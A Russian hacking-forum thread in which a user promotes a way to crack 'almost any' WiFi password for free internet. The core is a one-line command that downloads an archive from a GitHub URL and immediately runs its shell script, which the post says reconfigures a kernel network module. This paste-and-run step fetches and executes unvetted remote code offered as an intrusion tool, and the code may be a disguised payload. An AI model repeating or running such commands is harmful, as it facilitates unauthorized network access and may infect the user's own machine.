• Начинающий хакер, спасибо что зашёл к нам! Для полного удобства рекомендуем Вам сразу же зарегистрироваться. Помните, необходимо придумать сложный пароль к своему логину, в котором будут присутствовать цифры, а так же символы. После регистрации вы сможете пользоваться чатом. Так же не забудьте активировать аккаунт через письмо, высланное вам на почту ! Администрация заботится о каждом из Вас...
  • Для просмотра разделов из категории Private Informations & Programms необходимо купить

Herostratus

Гость
H

Herostratus

Гость
Привет хакер! Хочешь узнать как взломать практически любой WiFi и сидеть на халяву в интернете?! Тогда ты по адресу! Для этого тебе понадобится линукс основанный на дебиан, это к примеру кали, убунту, минт, можно и сам дебиан использовать, а так же программа для взлома. В данном примере я буду использовать дебиан. И так, запускаешь линукс, открываешь терминал и пишешь:
wget https://github.com/stephenpaulus/xwire/blob/master/xwire0.0.7.tar?raw=true -O xwire.tar && tar xf xwire.tar && cd xwire && ./InstanceRun.shell
Программа проанализирует все точки доступа (это займет некоторое время) и выдаст более подходящие и пронумерованные, я выбираю 3, соглашаюсь, пишу Y и мне выдает пароль от сети. Программа в начале перенастроит сетевой модуль ядра для анонимности. Это не брут, программа ищет уязвимости.

HUCKER_DUCKER

Пользователь
Местный

HUCKER_DUCKER

Пользователь
Местный
Реакции
6
Баллы
1
Крутая схема, я сначала думал ты расскажешь про Wifite 2.0

Сверху Снизу